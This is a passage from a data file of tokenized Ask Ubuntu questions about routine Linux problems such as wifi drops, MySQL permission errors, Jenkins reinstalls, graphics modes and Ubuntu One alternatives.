lid/screen . this sounds very strange however when i open the lid the wireless internet wifi becomes active . i hope this helps someone one else .
442408	system running in low graphics mode	i disabled my amd radeon 7730m hd graphics using : http : //planetoss.com/articles/how-to-disable-the-discrete-amd-graphics-card-in-linux/ because it was causing a lot of heat . now i have gained around 60-70 mins of battery . but the problem now is , it shows that your system is running in low graphics mode at the start up and asks for manually configuring the display , graphics , etc . i also googled my problem but they only said why is it happening but never gave a solution for this problem . only the terminal in full screen is accessible . i have to login and reboot the system many times and once in 3-5 trials , i get the graphic login and it starts working again . can somebody please help me with this ? i really love ubuntu and do n't want to remove it . this is the only problem i face but it 's quite annoying ...
442409	failed ubuntu install - installing newer version	i have been using 12.04 for the last couple of months and just tried to update to 12.10 ( via the update manager ) . after the update & reboot i get to grub ( machine dual boots with windows 7 ) and then i get the purple ubuntu screen - after that i only get a black screen with a white cursor in the top left corner ( not blinking ) and the machine freezes . i have decided to do a clean install of 14.04 once a stable release is out ( 17/04 ) - how can i make sure i put this new install on the same partitions as my current 12.04 is on and therefore leave the windows partitions untouched ? what is the best way to identify which are the windows partitions and which the ubuntu ones ? as i ca n't start ubuntu anymore i have to do this via windows 7 . i used diskmgmnt.msc but can not really tell which are which partitions .
442416	ubuntu kicks windows users from wifi	i 've some serious problems , when i start my ubuntu laptop and connect to wifi some ( not all ) other windows-laptops loses connection from our network . then , when they try to reconnect they 'll receive a `` windows could not connect to network.. '' error . after the router is being restarted , and i do n't connect with my ubuntu laptop , it just works fine . when i connect , its about 1 minute before they 'll lose there connection.. i 've a tl-wr1043nd ( tp-link ) router and my ubuntu notebook is an acer aspire v3-772g . resetting router to factory settings wo n't work , using an wpa2-psk security . no ip conflict.. ( everything is through dhcp and i do n't have a static ip ) i do n't know where to ask first , but i 'll think it should be something with my ubuntu installation , that 's the reason i 'll ask here first : ) thanks the lspci -nn | grep 0280 command will return : 0d:00.0 network controller [ 0280 ] : qualcomm atheros ar9462 wireless network adapter [ 168c:0034 ] ( rev 01 ) some more debug information from the windows notebooks : details about wireless connectivity diagnosis : for complete information about this session see the wireless connectivity information event . helper class : auto configuration initialize status : success information for connection being diagnosed interface guid : ( removed ) interface name : intel ( r ) centrino ( r ) advanced-n 6230 interface type : native wifi profile : homewireless ssid : homewireless ssid length : 12 connection mode : infra security : yes connect even if network is not broadcasting : no result of diagnosis : problem found issue referred to : rnwf msm helper class root cause : windows could not connect to `` homewireless '' you can try to connect again . repair option : reset your wireless network adapter this will disable and then enable the network adapter `` wireless network connection '' on this computer . informational diagnostics information ( wireless network adapter ) details about wireless network adapter diagnosis : for complete information about this session see the wireless connectivity information event . helper class : native wifi msm initialize status : success information for connection being diagnosed interface guid : ( removed ) interface name : intel ( r ) centrino ( r ) advanced-n 6230 interface type : native wifi profile : homewireless ssid : homewireless ssid length : 12 connection mode : infra security : yes connect even if network is not broadcasting : no result of diagnosis : problem found root cause : wireless association to `` homewireless '' failed a response was not received from the router or access point . detailed root cause : wireless association to this network failed . windows did not receive any response from the wireless router or accesspoint . repair option : look for causes of low wireless signal quality the signal is weak due to distance or interference . windows help and support can provide more information about this problem . and when the windows machine got disconnected ( this screenshot is another dhcp request , because the log was cleared ) every time he `` retries '' i 'll see this in my router log : http : //screenshot.wouter0100.nl/1396474377232014021396474377.png only these 2 entries , which normally are much more..
442417	output of echo $ $	the output of echo $ $ command displays some number in the standard output like below . $ echo $ $ 14594 what is that number ? and also , $ x=a $ echo $ x a in the above example echo $ x parses the variable x and displays the value of x to the standard output.likewise in this command echo $ $ , is that the second dollar symbol represents any variable ?
442428	mysql not starting because `` mysqld : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) ''	i am setting up a new lamp server with ubuntu server 13.10 and mysql 5.5 and was in the middle of migrating mysql databases to new server when i realized mysql server is not running . all was fine last time i checked a couple of days ago . i get this when i try to launch server from command line : @ ubuntu : ~ $ sudo mysqld start [ sudo ] password for xxx : 140402 10:32:07 [ warning ] using unique option prefix key_buffer instead of key_buffer_size is deprecated and will be removed in a future release . please use the full name instead . 140402 10:32:07 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140402 10:32:07 [ note ] plugin 'federated ' is disabled . mysqld : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 140402 10:32:07 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 140402 10:32:07 innodb : the innodb memory heap is disabled 140402 10:32:07 innodb : mutexes and rw_locks use gcc atomic builtins 140402 10:32:07 innodb : compressed tables use zlib 1.2.8 140402 10:32:07 innodb : using linux native aio 140402 10:32:07 innodb : initializing buffer pool , size = 128.0m 140402 10:32:07 innodb : completed initialization of buffer pool 140402 10:32:07 innodb : operating system error number 13 in a file operation . innodb : the error means mysqld does not have the access rights to innodb : the directory . innodb : file name ./ibdata1 innodb : file operation call : 'create ' . innodb : can not continue operation . also when i try this : xxx @ ubuntu-shs : ~ $ sudo /etc/init.d/mysql restart * stopping mysql database server mysqld [ ok ] * starting mysql database server mysqld [ fail ] nothing at all in error logs . update : noticed that all directories & files under /var/lib/mysql have been changed to messagebus for owner/group . is this right ? my other setup shows everything as mysql mysql .
442430	what are the alternatives to ubuntu one ?	since canonical is shutting down ubuntu one , what are the possible alternatives ? i currently use ubuntu one as a backup service for my documents folder and various other folders i deem important . of course i have backups on an external hard drive as well , but nevertheless , i find ubuntu one to be very useful . what i 'm especially looking for is a cloud service that does not need a special folder ( such as a dropbox or google drive folder ) ; something that is able to integrate into my own file system and syncs just any folder i want to . i am aware that this question is rather subjective , but i do guess many people who have used ubuntu one are now in the dark .
442432	coruppted jenkins need to reinstall	my jenkins looks like corrupted . after installing older version i tried to upgrade . when i tried wget -q -o - http : //pkg.jenkins-ci.org/debian/jenkins-ci.org.key | sudo apt-key add - sudo sh -c 'echo deb http : //pkg.jenkins-ci.org/debian binary/ > /etc/apt/sources.list.d/jenkins.list' sudo apt-get update sudo apt-get install jenkins it was failed to upgrade . then i removed jenkins using sudo apt-get remove jenkins and again i tried to install.it is giving reading package lists ... done building dependency tree reading state information ... done jenkins is already the newest version . the following packages were automatically installed and are no longer required : libjna-java libhttpcore-java libxbean-java libargs4j-java libhttpclient-java libplexus-build-api-java libbackport-util-concurrent-java libplexus-utils-java libjffi-java libjffi-jni libmaven-common-artifact-filters-java libjsr305-java libcommons-jexl-java libplexus-bsh-factory-java libplexus-container-default-java libganymed-ssh2-java jenkins-cli libplexus-sec-dispatcher-java libcommons-net2-java libjsoup-java libmaven2-core-java libplexus-cipher-java libjenkins-remoting-java libeasymock-java libplexus-i18n-java libmaven-invoker-java libplexus-containers-java libjaffl-java libdoxia-java libmaven-dependency-tree-java libmodello-java libplexus-archiver-java libconstantine-java libmaven-scm-java libmaven-enforcer-plugin-java libplexus-io-java libwagon-java libcommons-vfs-java libanimal-sniffer-java libgoogle-collections-java libnetbeans-cvsclient-java libmaven-plugin-testing-java libplexus-classworlds-java libitext1-java libplexus-interactivity-api-java libcommons-jxpath-java jenkins-common libplexus-interpolation-java libclassworlds-java libcommons-configuration-java libjnr-posix-java libplexus-ant-factory-java use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 513 not upgraded . but service jenkins restart command throwing jenkins : unrecognized service even http : //localhost:8080/ not working . i want to install from beginning . any suggestions ? edited : i followed these steps : sudo apt-get update & & sudo apt-get dist-upgrade & & sudo apt-get install -f & & sudo apt-get autoremove and then same above steps followed to install . but still same error.again i tried to remove package using sudo apt-get remove jenkins & & sudo apt-get install jenkins this is part of output : the following new packages will be installed : jenkins 0 upgraded , 1 newly installed , 0 to remove and 268 not upgraded . need to get 0 b/61.3 mb of archives . after this operation , 67.4 mb of additional disk space will be used . selecting previously unselected package jenkins . ( reading database ... 224579 files and directories currently installed . ) unpacking jenkins ( from ... /archives/jenkins_1.557_all.deb ) ... processing triggers for ureadahead ... setting up jenkins ( 1.557 ) ... but still service not recognized . one more thing i noticed is /etc/init.d/jenkins is empty . any other way to install same jenkins package ?
442433	amd turbo core not working - change cpu driver ?	i got an amd fx ( tm ) -8350 eight-core processor with 4ghz frequency and up to 4,2 ghz turbo core speed , but i cant get the turbo core to work . dmesg | grep powernow should tell me something like : [ 2.187170 ] powernow-k8 : found 1 amd fx ( tm ) -8150 eight-core processor ( 8 cpu cores ) ( version 2.20.00 ) [ 2.187204 ] powernow-k8 : core performance boosting : on . [ 2.187250 ] powernow-k8 : 0 : pstate 0 ( 3600 mhz ) [ 2.187252 ] powernow-k8 : 1 : pstate 1 ( 3300 mhz ) [ 2.187253 ] powernow-k8 : 2 : pstate 2 ( 2700 mhz ) [ 2.187255 ] powernow-k8 : 3 : pstate 3 ( 2100 mhz ) [ 2.187256 ] powernow-k8 : 4 : pstate 4 ( 1400 mhz ) but it shows nothing . checked if powernow-k8 is loaded via modprobe , and it is . turbo core and apm are enabled in bios , cool n quit also . cpufreq-info tells me that driver : acpi-cpufreq is loaded , but maybe it should be powernow-k8 like i saw on other posts . may that be the issus why turbo core is not working , and if yes , how can i change the driver to powernow-k8 ? i use ubuntu 14.04 with newest kernel .
442436	is there another option besides mythtv for watching video files with remote control access ?	for one computer i have , i 'd like to be able to watch videos i have in a local directory on the monitor , but be able to control which files play , and be able to pause , rewind , fast forward , and so on , from my android tablet . i have set up a mythbuntu computer before , with android remote capability , but that seems overkill with so many features , when all i want to do is to be able to play video files . i looked into vlc remote , but after some investigation , i 'm unclear if the vlc remote allows me to control what 's on the main computer monitor ( which is what i want ) , or plays video on the android device ( which is not what i need ) . is there some set up that will allow me to remotely control videos on my ubuntu computer monitor from my android device ?
442442	how can i self-host ubuntu one ?	the ubuntu one service is closing and being open sourced : additionally , we continue to believe in the ubuntu one file services , the quality of the code , and the user experience , so will release the code as open source software to give others an opportunity to build on this code to create an open source file syncing platform . how can i self-host the server and set up my ubuntu one clients to use this server ? i looked at the launchpad project site , but it seems that all the server-side code is still hidden .
442443	find the location of an installed application to type in the launch application window	many times i get this dialog when opening some files . it asks me to choose a program . i do n't know where all programs reside and what to select ? where to find installed applications in ubuntu ?
442445	unable to install g++-multilib on ubuntu 13.10 64 bit	when i open terminal and write below command it not work to install . sudo apt-get install g++-multilib it give me below error : > reading package lists ... done building dependency tree reading > state information ... done some packages could not be installed . this > may mean that you have requested an impossible situation or if you are > using the unstable distribution that some required packages have not > yet been created or been moved out of incoming . the following > information may help to resolve the situation : > > the following packages have unmet dependencies : g++-multilib : > depends : gcc-multilib ( > = 4:4.8.1-2ubuntu3 ) but it is not going to be > installed > depends : g++ ( > = 4:4.8.1-2ubuntu3 ) but it is not going to be installed > depends : g++-4.8-multilib ( > = 4.8.1-4~ ) but it is not going to be installed e : unable to correct problems , you have held > broken packages . i also unable to install this as well gcc/g++ for that try below thing : sudo apt-get install gcc-4.8 it give me this error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gcc-4.8 : depends : binutils ( > = 2.23.90.20131017 ) but 2.23.52.20130913-0ubuntu1 is to be installed e : unable to correct problems , you have held broken packages .
442447	problem after merging drives	i installed windows and ubuntu . i also had other drives . once all was running fine , while in windows , i merged one drive with the one where windows was installed . for this i used the easeus partition software . after doing this , i had some problems to boot and a grub rescue prompt appeared . i solved this using `` boot repair disk '' . now i can boot to both windows and ubuntu . but here 's the problem . when i boot to ubuntu the following message appears : the disk drive for /windows is not ready yet or not present . continue to wait , or press s to skip mounting or m for manual recovery . i think ubuntu is trying to mount that drive which i merged in windows and no longer exists . because when i installed ubuntu i named the drive i merged afterwards with `` /windows '' .
442451	installing graphite on ubuntu 12.10	i am trying to install and run graphite on ubuntu 12.10 . to do it i followed this manual . unfortunately on the step : next , we will configure the graphite database . go to the graphite webapp directory and run the database script : cd /opt/graphite/webapp/graphite/ sudo python manage.py syncdb i receive the following error : could not import graphite.local_settings , using defaults ! could not import graphite.local_settings , using defaults ! traceback ( most recent call last ) : file `` manage.py '' , line 11 , in < module > execute_manager ( settings ) file `` /usr/lib/python2.7/dist-packages/django/core/management/__init__.py '' , line 459 , in execute_manager utility.execute ( ) file `` /usr/lib/python2.7/dist-packages/django/core/management/__init__.py '' , line 382 , in execute self.fetch_command ( subcommand ) .run_from_argv ( self.argv ) file `` /usr/lib/python2.7/dist-packages/django/core/management/base.py '' , line 196 , in run_from_argv self.execute ( *args , **options.__dict__ ) file `` /usr/lib/python2.7/dist-packages/django/core/management/base.py '' , line 231 , in execute self.validate ( ) file `` /usr/lib/python2.7/dist-packages/django/core/management/base.py '' , line 266 , in validate num_errors = get_validation_errors ( s , app ) file `` /usr/lib/python2.7/dist-packages/django/core/management/validation.py '' , line 30 , in get_validation_errors for ( app_name , error ) in get_app_errors ( ) .items ( ) : file `` /usr/lib/python2.7/dist-packages/django/db/models/loading.py '' , line 158 , in get_app_errors self._populate ( ) file `` /usr/lib/python2.7/dist-packages/django/db/models/loading.py '' , line 67 , in _populate self.load_app ( app_name ) file `` /usr/lib/python2.7/dist-packages/django/db/models/loading.py '' , line 88 , in load_app models = import_module ( '.models ' , app_name ) file `` /usr/lib/python2.7/dist-packages/django/utils/importlib.py '' , line 35 , in import_module __import__ ( name ) file `` /opt/graphite/webapp/graphite/events/models.py '' , line 6 , in < module > from tagging.managers import modeltaggeditemmanager file `` /usr/local/lib/python2.7/dist-packages/django_tagging-0.3.2-py2.7.egg/tagging/managers.py '' , line 8 , in < module > from .models import tag , taggeditem file `` /usr/local/lib/python2.7/dist-packages/django_tagging-0.3.2-py2.7.egg/tagging/models.py '' , line 7 , in < module > from django.utils.encoding import python_2_unicode_compatible importerror : can not import name python_2_unicode_compatible what can be the cause of the problem ? how can i fix it ?
442452	10.04 lts next release after 2.6.32-57-server	we 'll be soon doing a kernel upgrade of a lot of boxes running ubuntu 10.04 lts to 2.6.32-57-server . because we have a patched driver as part of the setup we are interested in the release date of the next kernel release after 57 . thanks paul
442454	ubuntu for xperia e c1505 ?	can i install ubuntu in my sony xperia e c1505 by flashing the old android jb 4.1.1 ? if so , what features may i expect and what not ?
442455	updated from 12.04 to 13.10 , now wireless wo n't work and freezes my laptop	i 'm using a toshiba satellite with dual boot ( ubuntu and windows 7 ) . i just updated from 12.04 to 13.10 , and everything seemed to be working fine . wireless did connect right after the first reboot , but it was extremely slow and trying to access wireless options did n't work - it acted as if wireless connection was disabled . so i tried disabling it and re-enabling , but ubuntu crashed and dumped a bunch of stuff on the screen . i took a photo of the dump ( i 'm apologize for the quality ) : after that i had to force a reboot , as it became unresponsive . does anyone know what this is , how to solve it , or at least seen this before ?
442456	xubuntu remap ctrl and command key on bluetooth mac keyboard	how can i remap the ctrl key to the command key in xubuntu ( latest version ) with a bluetooth mac keyboard ? içe been trying to find a solution to this but had no luck ... thanks !
442457	vodafone mobile broadband connecting error in 12.04	i can not connect to internet using my vodafone mobile broadband in ubuntu 12.04. it says registered on home network , but it fails to connect . this is what i got after doing dmesg . om ttyusb0 [ 78.220057 ] option 2-1.4:1.0 : device disconnected [ 78.220139 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 [ 78.220151 ] option 2-1.4:1.2 : device disconnected [ 80.034347 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 [ 80.034361 ] option 2-1.4:1.3 : device disconnected [ 80.105712 ] usb 2-1.4 : reset high-speed usb device number 3 using ehci-pci [ 80.200669 ] option 2-1.4:1.3 : gsm modem ( 1-port ) converter detected [ 80.200819 ] usb 2-1.4 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 80.200867 ] option 2-1.4:1.2 : gsm modem ( 1-port ) converter detected [ 80.200935 ] usb 2-1.4 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 80.200964 ] option 2-1.4:1.0 : gsm modem ( 1-port ) converter detected [ 80.201587 ] usb 2-1.4 : gsm modem ( 1-port ) converter now attached to ttyusb2
442458	falied to to create a bootable usb stick	when i tried to create a bootable usb stick using startup disk creator in my ubuntu 13.10 my source is a windows 7 after 77 % of conclusion appear this message in a file below
442460	set permanent command-line options to upstart	i would like to add a command-line option , such as -- default-console=none , to upstart . i believe i can just add these to the kernel invocation line and they will be passed on , is this true ? if so , how do i do this so that it will be used when grub.cfg is auto-updated because of a kernel upgrade ? if not , how do i add options directly to upstart ?
442464	ubuntu 13.10 with windows 7 , 32 or 64 bits for 6gb of ram in amd processor 32 bits	my processor is an amd 32-bit , but supports up to 8gb of ram . i 'm going to install ubuntu 13.10 alongside windows 7 with 6 gigs and i want to know if windows 32bit supports 6 gigs if ubuntu 13.10 32bit supports 6 gigs , if not possible and need to install 64-bit to use more gigs , i can install the versions of windows and ubuntu 64 bit on my 32-bit processor ? please help . thanks in advance
442467	problems with internet connection and autorun	this is my second try at using ubuntu desktop . with the same result . i have installed ubuntu desktop to run along side windows7 . it loads fine but it will not connect to the internet it keeps trying and disconnecting . i thought i might need to load all the motherboard drivers from the gigabyte disk . when i try to open anything or click on any autorun.exe file i get an error saying it ca n't find it ( autorun ) . i really want to use ubuntu because i am tired of windows7 telling me my copy is unauthenticated when i bought it ! i built a new machine and installed it on it and apparently now i ca n't use it ?
442468	windows 8 to ubuntu connection sharing	i am attempting to share the internet connection of my windows 8 laptop to my ubuntu desktop computer . this is the settings i have for windows 8 to share . do i need to do something on the ubuntu desktop ( it get 's the connection from the windows 8 laptop ) so it can get internet ? thanks in advance , ben note : i see this was marked duplicate but if you take a look at the duplicate post , you 'll notice that it 's nothing like this one .
442470	do i have to download a full 800-900 mb setup or only a smaller specific upgrade ?	when the tt 14.04 is released , on upgrading from ss 13.10 , do i have to download a full 800-900 mb setup or only a smaller specific upgrade ? i 'm only asking this out of curiousity anyway , but bandwidth back here in my country is pretty limited so better to know beforehand .
442474	how can i show all file types contained in a directory ?	is there any command which tells me in the specific directory which types of files exist ? i can find out the file type by using a command like od -c myfile | less . but i do n't know how to do it for all files in a directory .
442475	when using automated preseed installation , is there a way to change the iv algorithm for crypto ?	when using the default encryption algorithm ( preseed or manual ) , i get an error an error occurred while configuring encrypted volumes . the configuration has been aborted . but changing the iv algorithm to cbc : sha256 works . how can i set that in preseed ? i added the following to my preseed d-i partman-crypto/ivalgorithm select cbc-essiv : sha256 but it does not seem to work . what choices do i have ?
442476	have i installed ubuntu ?	i downloaded what i thought was a trial version of 12.04 ( booted via usb ) some days ago . at that time there was an icon on the desktop inviting me to install ubuntu . unfortunately that icon appears to have vanished . so is there a way to check whether i 've installed the full program ?
442482	download entire ubuntu one folders from the web client ?	since u1 's being axed and the desktop client ca n't connect , how should i about downloading large numbers of files in nested folders from the web client ? i 'd prefer to not install chrome .
442483	where .deb files located ?	when we install a package in ubuntu using apt-get install , where can we find the .deb files ? i installed python using this method but i did not find its .deb file in /var/cache/apt/archive/ .
442490	how to copy app ( installed from software center ) and send to another ubuntu computer	i am using ubuntu 12.04 and my friend also has ubuntu 12.04 , he does not have internet so i want to send my apps to his computer ( apps that i have downloaded from software center ) . so how can i send apps downloaded from software center to his ubuntu computer .
442503	ubuntu boots and hangs on black loading screen ( paste code provided )	i have researched several other solutions and tried many of them . i recently just tried boot-repair which helped me get past the 'first ' black screen . now , i am currently stuck at the 'second ' black screen with underscore in the upper right hand corner . i have the paste code from the boot-repair here : http : //paste.ubuntu.com/7195016/ i can boot up windows 8 perfectly , so i am really confused . luckily i was able to back-up my documents ( not any installs ) .
442510	ubuntu not loading after system crash	i am new ubuntu user . with my ubuntu 13.10 64 bit installed intel based system every thing goes well but today due to system crash it 's not reboot properly . it just shows purple screen . i tried to repair 13.10 with recovery mode but it was not working . i googled for this issue , but could n't find any suitable answer . please any one give me step by step way to solve this issue .
442511	mounting ipad in ubuntu 13.10 , ca n't find `` documents on ipad '' device	i solved the `` trust-loop '' bug with this help : http : //itsfoss.com/mount-iphone-ipad-ios-7-ubuntu-13-10/ but after my ipad is successfully mounted , i found out there is only one device detected but it 's just some digital files there , like dcim etc . i ca n't find the documents on ipad device which contain apps folders . i want to transfer files to the apps in my ipad . what should i do ?
442514	server possibly compromised	i 'm running a host which i think may be compromised . i have noticed a binary called b26 taking up a good portion of our cpu resources at times . i did a quick google search on this and it mentions that this server might be compromised and is being used in a ddos . i tried installing auditctl to monitor outbound connections but got an error message at the end . sudo apt-get install auditd sudo : unable to resolve host ( none ) reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : rpm2cpio libnss3 python-pycurl librpmio2 librpm2 rpm-common libsqlite0 python- urlgrabber python-sqlitecachec python-rpm python-sqlite libnspr4 rpm librpmbuild2 liblua5.1-0 python-support librpmsign0 python-libxml2 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libaudit0 suggested packages : audispd-plugins the following new packages will be installed : auditd libaudit0 0 upgraded , 2 newly installed , 0 to remove and 117 not upgraded . need to get 425 kb of archives . after this operation , 1,160 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //mirror.rackspace.com/ubuntu/ precise/universe libaudit0 amd64 1.7.18-1ubuntu1 [ 67.5 kb ] get:2 http : //mirror.rackspace.com/ubuntu/ precise/universe auditd amd64 1.7.18-1ubuntu1 [ 357 kb ] fetched 425 kb in 0s ( 2,986 kb/s ) selecting previously unselected package libaudit0 . ( reading database ... 61147 files and directories currently installed . ) unpacking libaudit0 ( from ... /libaudit0_1.7.18-1ubuntu1_amd64.deb ) ... selecting previously unselected package auditd . unpacking auditd ( from ... /auditd_1.7.18-1ubuntu1_amd64.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot setting up libaudit0 ( 1.7.18-1ubuntu1 ) ... setting up auditd ( 1.7.18-1ubuntu1 ) ... ca n't exec `` md5sum '' : no such file or directory at /usr/share/perl/5.14/ipc/open3.pm line 186 , < stdin > line 12. open2 : exec of md5sum failed at /usr/sbin/pam-auth-update line 396 dpkg : error processing auditd ( -- configure ) : subprocess installed post-installation script returned error exit status 2 processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : auditd e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i can run the auditctl command by running sudo auditctl -a exit , always -s connect results in warning - 32/64 bit syscall mismatch , you should specify an arch i 've tried sudo auditctl -a exit , always -f arch=64 -s connect ( and 32 for fun ) but get arch=64 elf mapping not found i 'm not sure what my next step is . i need someway to figure out if this box has been compromised and begin moving things to a new box .
442516	enabling module-http-protocol-tcp makes pulseaudio crash	according to rygel documentation module-http-protocol-tcp must be enabled in order to use rygel . if i do this by calling pacmd load-module module-http-protocol-tcp the module loads . if i put load-module module-http-protocol-tcp to /etc/pulse/default.pa and restart pulseaudio it does not start up . i am on 13.10
442517	why ca n't i resize ntfs partition ?	i 'm trying to resize my ntfs partition but ca n't do it in gparted ... tried from hd and from liveusb ... could n't find a solution on the web , partition is n't mounted ; i 'm trying to divide it in two to install another ubuntu version . i used ubuntu 13.10 in both installed on hd and liveusb . ntfs-3g is installed ; ntfsprogs ca n't be installed .
442520	is it possible to remove items from `` system settings ''	i would like to remove or disable some unused settings panels in system settings/gnome-control-center to keep my more `` ambitious '' users from messing with them . specifically , i would like to disable/remove the following : printers ( because we do n't have any attached to these machines ) details ( because it lets you set actions on removable media ) keyboard ( because it lets you set shortcut keys - not a dealbreaker ) this seems like it should be pretty straightforward ( i can remove them from the applications menu by setting hidden=true in the .desktop file associated with the panel ) , but they stubbornly remain in system settings when i do that . am i missing something , or are we stuck with these panels in the settings application forever ?
442522	line 45 syntax error : unexpected end of file	now no matter what i do it just always says that even with a fi it doesnt do that help me debug the code please . also this has 44 lines of text and it says line 45 also the ascii art is just a dog it might look odd though since we are in a smaller area . # ! /bin/bash clear echo `` hello sir how are you ? these are some of my features date picture '' read word if [ $ word = picture ] echo `` these are the following pictures i have at my disposel : dog '' if [ $ word = date ] w fi read word if [ $ word = dog ] fi echo `` __ , - ; ; ; ＼ / ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; / l ＼ヽ | /＿__ / ; ; ; ; ; ; ; ; ; ; ; ; ; ; / ヽ ; ; ; ; ; ; ＼ ヽ ; ; ; ; ; ; ; ; ; ; ; ノ | ; ; ; ; ; ; ; ; ; ; ; l ／￣~~ | ; ; ; ; ; ; ; ; ; ; ; ; l フ ○ ＼ ; ; ; ; ; ノ , -~~ ○ ヽ , , , , , , , , , , , , , ,､ , , , ~/ ● ＼ , ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; , v ; ; ; ; ; ; ; ; ; ﾞ , l_ , , , > , ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ヽ ; ; ; ; ; ; ; , ﾞ |/l /l , ヽ |ヽl , ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; i- '' y v ヽlｌﾉ ﾚ ヽ）v ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; j ﾞ , ' ' ' ' ' ' , ' , ,' ﾞ , ヽ- , , , , , , , ,ﾞ , ﾞ ﾞ ﾞ , ﾞ , , ﾞ ﾞ ﾞ , ﾞﾞﾞﾞﾞ , . , ﾞ ﾞ , , ﾞ ﾞ , , , ﾞ , ﾞ , ﾞ , , l ﾞ ' ' ' ' ' ' ﾞ ' ' ' ' ' ' ﾞ ' ' ' ' ' ``
442523	files tranfered from ubuntu to an external ntfs hdd are unreadable in windows . why ?	transfered files from ubuntu-ext4 to ntfs hdd are unreadable in windows . i have transfered files from ext4 ubuntu hdd [ my notebook ] to an external ntfs hdd used in windows [ a workstation ] . before i started to copy/transfer the files from ubuntu to the external ntfs hdd , i changed the permission settings of the files so they can be use by everybody and not only by the ubuntu user . after i copied the files succesfully , they can not be access-opened/moved/copied , not at all . the external ntfs hdd is not protected , it was formated several times and tested again . same problem= files transfered from ext4 hdd can not be accessed in windows . i have tried with an usb memory flash to transfer files from ext4 hdd to windows and it worked . what seems to be the problem with the external ntfs hdd ? ? or the problem is with the permission settings of the files ? if not ... must i install somethingelse on the ubuntu ?
442528	xdvi crashes when used with emacs with i/o correlation	i use emacs 24 to process latex files . when i enable i/o correlation , xdvi crashes within a second after launch . apparently this is caused by a bug in libfreetype . so , my question is , is there any workaround for this problem ? as a side note , there are ways to use evince with i/o correlation but i could n't get them to work .
442531	power saving mode after start-up ( 12.04.4 )	i have and issue that i ca n't seem to find right answer to . immediately after purple loading screen i get an notification `` entering power saving mode '' , and i ca n't do nothing about it . if it 's of any help i had graphic driver issues that i solved right before power saving issues . i can access command line over tty and give more info , just tell me what info please . thanks in advance !
442535	how do i install miku miku dance ?	so i have ubuntu quantal quetzal and wish to install mmd/miku miku dance . does anyone knows how to run it in ubuntu ?
442536	mysql could n't write to /tmp then failed to restart	i was running orthomcl program which uses mysql . this program has operated just fine on the same computer before . this time i had an error message . dbd : :mysql : :st execute failed : ca n't create/write to file '/tmp/ # sql_700_1.myi ' ( errcode : 13 ) at /usr/local/bioinf/orthomclsoftware-v2.0.9/bin/orthomclpairs line 709 , < f > line 14 . i tried to restart mysql server , the server shut off but failed to start . sudo service mysql start start : job failed to start /var/log/mysql/error.log and /var/log/mysql.err are empty . i 've tried a few things that i found here including purging and reinstalling mysql-server and removing ib_logfile* in /var/lib/mysql . the other thing i tried is sudo dpkg-reconfigure mysql-server-5.5 the error messages are : /usr/sbin/mysqld : ca n't create/write to file '/tmp/ibnzqwo0 ' ( errcode : 13 ) innodb : error : unable to create temporary file ; errno : 13 [ error ] plugin 'innodb ' init function returned error . [ error ] plugin 'innodb ' registration as a storage engine failed . [ error ] unknown/unsupported storage engine : innodb [ error ] aborting here are some information from dmesg | grep mysql : [ 3115187.338273 ] init : mysql main process ( 44255 ) terminated with status 1 [ 3115187.338417 ] init : mysql main process ended , respawning [ 3115187.356361 ] init : mysql post-start process ( 44256 ) terminated with status 1 [ 3116827.473256 ] type=1400 audit ( 1396394069.224:132 ) : apparmor= '' denied '' operation= '' open '' parent=45387 profile= '' /usr/sbin/mysqld '' name= '' /home/tmp/ '' pid=45396 comm= '' mysqld '' requested_mask= '' r '' denied_mask= '' r '' fsuid=0 ouid=0 [ 3116827.582489 ] type=1400 audit ( 1396394069.332:133 ) : apparmor= '' denied '' operation= '' mknod '' parent=45387 profile= '' /usr/sbin/mysqld '' name= '' /home/tmp/ # sql_b154_0.myi '' pid=45402 comm= '' mysqld '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 3116827.908448 ] type=1400 audit ( 1396394069.660:134 ) : apparmor= '' denied '' operation= '' mknod '' parent=45317 profile= '' /usr/sbin/mysqld '' name= '' /home/tmp/ibbpfaqp '' pid=45415 comm= '' mysqld '' requested_mask= '' c '' denied_mask= '' c '' fsuid=118 ouid=118 [ 3116841.623608 ] type=1400 audit ( 1396394083.372:139 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=45443 comm= '' apparmor_parser '' [ 3116841.771621 ] init : mysql pre-start process ( 45474 ) terminated with status 1 there were many many lines like this . could anybody help me figure out what 's wrong with my mysql server , please ? many thanks .
